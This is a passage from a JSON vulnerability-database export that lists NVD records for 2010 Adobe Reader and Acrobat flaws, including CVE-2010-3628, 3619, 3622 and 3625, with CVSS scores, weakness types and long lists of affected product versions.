"cpe:/a:adobe:acrobat_reader:8.1.6", "cpe:/a:adobe:acrobat_reader:8.2.2", "cpe:/a:adobe:acrobat_reader:9.0", "cpe:/a:adobe:acrobat:8.1.5", "cpe:/a:adobe:acrobat:8.0", "cpe:/a:adobe:acrobat:8.2.2", "cpe:/a:adobe:acrobat:8.1.3", "cpe:/a:adobe:acrobat_reader:9.1.1", "cpe:/a:adobe:acrobat_reader:8.1.2", "cpe:/a:adobe:acrobat_reader:9.1", "cpe:/a:adobe:acrobat_reader:8.1.7", "cpe:/a:adobe:acrobat:8.1.1", "cpe:/a:adobe:acrobat_reader:8.2.3", "cpe:/a:adobe:acrobat_reader:9.1.2", "cpe:/a:adobe:acrobat:8.1.7", "cpe:/a:adobe:acrobat_reader:8.1.1", "cpe:/a:adobe:acrobat:8.2.3", "cpe:/a:adobe:acrobat_reader:8.0", "cpe:/a:adobe:acrobat:9.3.1", "cpe:/a:adobe:acrobat_reader:8.1.4", "cpe:/a:adobe:acrobat:9.3.4", "cpe:/a:adobe:acrobat_reader:8.2.1", "cpe:/a:adobe:acrobat_reader:8.1"], "id": "CVE-2010-3657", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3657", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:adobe:acrobat:9.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1.1:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:57:29", "description": "Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2010-2890, CVE-2010-3619, CVE-2010-3621, CVE-2010-3622, CVE-2010-3632, and CVE-2010-3658.\nPer: http://www.adobe.com/support/security/bulletins/apsb10-21.html\r\n\r\n'This update resolves a memory corruption vulnerability that could lead to code execution (CVE-2010-3628).'", "edition": 3, "cvss3": {}, "published": "2010-10-06T17:00:00", "title": "CVE-2010-3628", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3628"], "modified": "2018-10-30T16:25:00", "cpe": ["cpe:/a:adobe:acrobat:8.1.6", "cpe:/a:adobe:acrobat_reader:9.1.3", "cpe:/a:adobe:acrobat:9.1", "cpe:/a:adobe:acrobat:9.3.2", "cpe:/a:adobe:acrobat:9.3", "cpe:/a:adobe:acrobat_reader:8.2", "cpe:/a:adobe:acrobat_reader:9.3.1", "cpe:/a:adobe:acrobat:9.1.1", "cpe:/a:adobe:acrobat:8.1.2", "cpe:/a:adobe:acrobat:9.3.3", "cpe:/a:adobe:acrobat_reader:9.3.2", "cpe:/a:adobe:acrobat:9.0", "cpe:/a:adobe:acrobat_reader:8.1.5", "cpe:/a:adobe:acrobat_reader:9.3", "cpe:/a:adobe:acrobat_reader:8.2.4", "cpe:/a:adobe:acrobat:9.2", "cpe:/a:adobe:acrobat:8.2.1", "cpe:/a:adobe:acrobat:9.1.2", "cpe:/a:adobe:acrobat:8.1", "cpe:/a:adobe:acrobat:8.2", "cpe:/a:adobe:acrobat_reader:9.3.3", "cpe:/a:adobe:acrobat:9.1.3", "cpe:/a:adobe:acrobat:8.1.4", "cpe:/a:adobe:acrobat:8.2.4", "cpe:/a:adobe:acrobat_reader:9.3.4", "cpe:/a:adobe:acrobat_reader:9.2", "cpe:/a:adobe:acrobat_reader:8.1.6", "cpe:/a:adobe:acrobat_reader:8.2.2", "cpe:/a:adobe:acrobat_reader:9.0", "cpe:/a:adobe:acrobat:8.1.5", "cpe:/a:adobe:acrobat:8.0", "cpe:/a:adobe:acrobat:8.2.2", "cpe:/a:adobe:acrobat:8.1.3", "cpe:/a:adobe:acrobat_reader:9.1.1", "cpe:/a:adobe:acrobat_reader:8.1.2", "cpe:/a:adobe:acrobat_reader:9.1", "cpe:/a:adobe:acrobat_reader:8.1.7", "cpe:/a:adobe:acrobat:8.1.1", "cpe:/a:adobe:acrobat_reader:8.2.3", "cpe:/a:adobe:acrobat_reader:9.1.2", "cpe:/a:adobe:acrobat:8.1.7", "cpe:/a:adobe:acrobat_reader:8.1.1", "cpe:/a:adobe:acrobat:8.2.3", "cpe:/a:adobe:acrobat_reader:8.0", "cpe:/a:adobe:acrobat:9.3.1", "cpe:/a:adobe:acrobat_reader:8.1.4", "cpe:/a:adobe:acrobat:9.3.4", "cpe:/a:adobe:acrobat_reader:8.2.1", "cpe:/a:adobe:acrobat_reader:8.1"], "id": "CVE-2010-3628", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3628", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:acrobat:9.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1.1:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:57:29", "description": "Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2010-2890, CVE-2010-3621, CVE-2010-3622, CVE-2010-3628, CVE-2010-3632, and CVE-2010-3658.", "edition": 3, "cvss3": {}, "published": "2010-10-06T17:00:00", "title": "CVE-2010-3619", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3619"], "modified": "2018-10-30T16:25:00", "cpe": ["cpe:/a:adobe:acrobat:8.1.6", "cpe:/a:adobe:acrobat_reader:9.1.3", "cpe:/a:adobe:acrobat:9.1", "cpe:/a:adobe:acrobat:9.3.2", "cpe:/a:adobe:acrobat:9.3", "cpe:/a:adobe:acrobat_reader:8.2", "cpe:/a:adobe:acrobat_reader:9.3.1", "cpe:/a:adobe:acrobat:9.1.1", "cpe:/a:adobe:acrobat:8.1.2", "cpe:/a:adobe:acrobat:9.3.3", "cpe:/a:adobe:acrobat_reader:9.3.2", "cpe:/a:adobe:acrobat:9.0", "cpe:/a:adobe:acrobat_reader:8.1.5", "cpe:/a:adobe:acrobat_reader:9.3", "cpe:/a:adobe:acrobat_reader:8.2.4", "cpe:/a:adobe:acrobat:9.2", "cpe:/a:adobe:acrobat:8.2.1", "cpe:/a:adobe:acrobat:9.1.2", "cpe:/a:adobe:acrobat:8.1", "cpe:/a:adobe:acrobat:8.2", "cpe:/a:adobe:acrobat_reader:9.3.3", "cpe:/a:adobe:acrobat:9.1.3", "cpe:/a:adobe:acrobat:8.1.4", "cpe:/a:adobe:acrobat:8.2.4", "cpe:/a:adobe:acrobat_reader:9.3.4", "cpe:/a:adobe:acrobat_reader:9.2", "cpe:/a:adobe:acrobat_reader:8.1.6", "cpe:/a:adobe:acrobat_reader:8.2.2", "cpe:/a:adobe:acrobat_reader:9.0", "cpe:/a:adobe:acrobat:8.1.5", "cpe:/a:adobe:acrobat:8.0", "cpe:/a:adobe:acrobat:8.2.2", "cpe:/a:adobe:acrobat:8.1.3", "cpe:/a:adobe:acrobat_reader:9.1.1", "cpe:/a:adobe:acrobat_reader:8.1.2", "cpe:/a:adobe:acrobat_reader:9.1", "cpe:/a:adobe:acrobat_reader:8.1.7", "cpe:/a:adobe:acrobat:8.1.1", "cpe:/a:adobe:acrobat_reader:8.2.3", "cpe:/a:adobe:acrobat_reader:9.1.2", "cpe:/a:adobe:acrobat:8.1.7", "cpe:/a:adobe:acrobat_reader:8.1.1", "cpe:/a:adobe:acrobat:8.2.3", "cpe:/a:adobe:acrobat_reader:8.0", "cpe:/a:adobe:acrobat:9.3.1", "cpe:/a:adobe:acrobat_reader:8.1.4", "cpe:/a:adobe:acrobat:9.3.4", "cpe:/a:adobe:acrobat_reader:8.2.1", "cpe:/a:adobe:acrobat_reader:8.1"], "id": "CVE-2010-3619", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3619", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:acrobat:9.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1.1:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:57:29", "description": "Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2010-2890, CVE-2010-3619, CVE-2010-3621, CVE-2010-3628, CVE-2010-3632, and CVE-2010-3658.\nPer: http://www.adobe.com/support/security/bulletins/apsb10-21.html\r\n\r\n'This update resolves a memory corruption vulnerability that could lead to code execution(CVE-2010-3622).'", "edition": 3, "cvss3": {}, "published": "2010-10-06T17:00:00", "title": "CVE-2010-3622", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3622"], "modified": "2018-10-30T16:25:00", "cpe": ["cpe:/a:adobe:acrobat:8.1.6", "cpe:/a:adobe:acrobat_reader:9.1.3", "cpe:/a:adobe:acrobat:9.1", "cpe:/a:adobe:acrobat:9.3.2", "cpe:/a:adobe:acrobat:9.3", "cpe:/a:adobe:acrobat_reader:8.2", "cpe:/a:adobe:acrobat_reader:9.3.1", "cpe:/a:adobe:acrobat:9.1.1", "cpe:/a:adobe:acrobat:8.1.2", "cpe:/a:adobe:acrobat:9.3.3", "cpe:/a:adobe:acrobat_reader:9.3.2", "cpe:/a:adobe:acrobat:9.0", "cpe:/a:adobe:acrobat_reader:8.1.5", "cpe:/a:adobe:acrobat_reader:9.3", "cpe:/a:adobe:acrobat_reader:8.2.4", "cpe:/a:adobe:acrobat:9.2", "cpe:/a:adobe:acrobat:8.2.1", "cpe:/a:adobe:acrobat:9.1.2", "cpe:/a:adobe:acrobat:8.1", "cpe:/a:adobe:acrobat:8.2", "cpe:/a:adobe:acrobat_reader:9.3.3", "cpe:/a:adobe:acrobat:9.1.3", "cpe:/a:adobe:acrobat:8.1.4", "cpe:/a:adobe:acrobat:8.2.4", "cpe:/a:adobe:acrobat_reader:9.3.4", "cpe:/a:adobe:acrobat_reader:9.2", "cpe:/a:adobe:acrobat_reader:8.1.6", "cpe:/a:adobe:acrobat_reader:8.2.2", "cpe:/a:adobe:acrobat_reader:9.0", "cpe:/a:adobe:acrobat:8.1.5", "cpe:/a:adobe:acrobat:8.0", "cpe:/a:adobe:acrobat:8.2.2", "cpe:/a:adobe:acrobat:8.1.3", "cpe:/a:adobe:acrobat_reader:9.1.1", "cpe:/a:adobe:acrobat_reader:8.1.2", "cpe:/a:adobe:acrobat_reader:9.1", "cpe:/a:adobe:acrobat_reader:8.1.7", "cpe:/a:adobe:acrobat:8.1.1", "cpe:/a:adobe:acrobat_reader:8.2.3", "cpe:/a:adobe:acrobat_reader:9.1.2", "cpe:/a:adobe:acrobat:8.1.7", "cpe:/a:adobe:acrobat_reader:8.1.1", "cpe:/a:adobe:acrobat:8.2.3", "cpe:/a:adobe:acrobat_reader:8.0", "cpe:/a:adobe:acrobat:9.3.1", "cpe:/a:adobe:acrobat_reader:8.1.4", "cpe:/a:adobe:acrobat:9.3.4", "cpe:/a:adobe:acrobat_reader:8.2.1", "cpe:/a:adobe:acrobat_reader:8.1"], "id": "CVE-2010-3622", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3622", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:acrobat:9.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1.1:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:57:29", "description": "Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allow attackers to execute arbitrary code via unspecified vectors, related to a \"prefix protocol handler vulnerability.\"\nPer: http://www.adobe.com/support/security/bulletins/apsb10-21.html\r\n\r\n'This update resolves a prefix protocol handler vulnerability that could lead to code execution (CVE-2010-3625).'", "edition": 3, "cvss3": {}, "published": "2010-10-06T17:00:00", "title": "CVE-2010-3625", "type": "cve", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3625"], "modified": "2018-10-30T16:25:00", "cpe": ["cpe:/a:adobe:acrobat:8.1.6", 